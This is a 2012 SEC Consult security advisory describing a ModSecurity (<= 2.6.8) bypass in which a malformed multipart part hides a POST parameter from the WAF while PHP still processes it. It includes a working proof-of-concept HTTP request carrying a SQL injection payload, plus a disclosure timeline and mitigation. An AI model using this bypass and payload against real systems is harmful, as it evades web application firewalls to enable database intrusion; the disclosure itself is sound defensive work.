ModSecurity multipart/invalid part ruleset bypass

SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >

=======================================================================

title: ModSecurity multipart/invalid part ruleset bypass

product: ModSecurity

vulnerable version: <= 2.6.8

fixed version: 2.7.0

CVE number: -

impact: Depends what you use it for

homepage: www.modsecurity.org

found: 2012-10-12

by: Bernhard Mueller

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

 

Vendor/product description:

---------------------------

ModSecurity for Apache is a web server plug-in for the Apache web server

platform. This is the original, most mature and deployed ModSecurity module.

This module is maintained by the Trustwave SpiderLabs Research Team.

 

URL: www.modsecurity.org/projects/modsecurity/apache/

 

 

Vulnerability overview/description:

-----------------------------------

Validation of POST parameters can be bypassed on Apache/PHP installations by

sending specially formed multipart requests. A POST parameter's content can be

hidden from ModSecurity by prepending an invalid part. This first part

contains only a Content-Disposition header and has an additional carriage

return inserted at the end of the line ([\r\r\n]). This is followed by a

boundary in the next line and another Content-Disposition header with a

filename. The request content looks like this (newlines are all \r\n except in

line 2).

 

--A
Content-Disposition: form-data; name="id"[\r][\r][\n]
--A
Content-Disposition: form-data; name="lol"; filename="x"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

--A--

 

ModSecurity skips what it believes to be an invalid first part and proceeds to

parse the second part. This part is treated as a file and not checked against

the ruleset.

 

PHP however treats the whole thing as a single part and processes only the

first Content-Disposition header, ignoring the second one. In the opinion of

PHP this request contains a POST parameter with the name specified in the

first header.

 

 

Proof of concept:

-----------------

 

wut.php:

--------

<? echo $POST[xxx] ?>


POST request:
-------------

POST /wut.php HTTP/1.1
Content-Type: multipart/form-data; boundary=A
Content-Length: 161

--A
Content-Disposition: form-data; name="xxx"[\r][\r][\n]
--A
Content-Disposition: form-data; name="yyy"; filename="z"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

--A--


Output:
-------

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

(any change in the header should produce a 403)

 

Vulnerable / tested versions:

-----------------------------

 

This works with ModSecurity up to version 2.6.8.

 

 

Vendor contact timeline:

------------------------

2012-10-11: Contacted ModSecurity

2012-10-15: ModSecurity guys fixed it

2012-10-16: New ModSecurity release 2.7.0

2012-10-17: Public release of advisory

 

 

Solution:

---------

To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure

that the MULTIPART_INVALID_PART flag is set in the multipart strict validation

rule. Add the line:

 

IQ %{MULTIPART_INVALID_PART}, \

 

to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.

 

Download is available at:

 

www.modsecurity.org/download/

 

 

 

Advisory URL:

--------------

www.sec-consult.com/en/advisories.html

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The SEC Consult Group

 

Office Vienna

Mooslackengasse 17

A-1190 Vienna

Austria

Tel.: +43 / 1 / 890 30 43 - 0

Fax.: +43 / 1 / 890 30 43 - 25

Mail: research at sec-consult dot com

www.sec-consult.com

 

 

Office Singapore

4 Battery Road

#25-01 Bank of China Building

Singapore (049908)

Mail: office at sec-consult dot sg

 

 

Check out our blog at:

blog.sec-consult.com

 

 

And this thing here:

wordpress.org/extend/plugins/mvis-security-center/

 

 

EOF B. Mueller / October 2012